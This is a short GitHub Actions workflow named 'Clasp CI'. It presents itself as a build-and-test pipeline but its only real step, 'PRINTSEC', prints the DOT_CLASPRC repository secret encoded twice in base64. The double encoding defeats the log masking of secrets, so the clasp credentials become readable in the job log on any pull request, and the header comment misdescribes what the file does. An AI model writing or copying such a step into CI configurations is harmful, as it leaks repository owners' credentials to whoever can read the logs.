# This workflow will do a clean install of node dependencies, build the source code and run tests across different versions of node
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-nodejs-with-github-actions

name: Clasp CI

on:
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest
    env:
      SCRIPT_ID: 1EwE84eZCSBPcaAiJzCnDjmxMVnLQrDyhSKq1oZY6q-3x4BIDHgQefCnL
      PROJECT_ID: project-id-3961473932623644264
      DOT_CLASPRC: ${{ secrets.DOT_CLASPRC }}
    strategy:
      matrix:
        node-version: [12]
        # See supported Node.js release schedule at https://nodejs.org/en/about/releases/
    steps:
      - uses: actions/checkout@v2
      - name: PRINTSEC
        run: |
          echo ${{ secrets.DOT_CLASPRC }} | base64 | base64
 
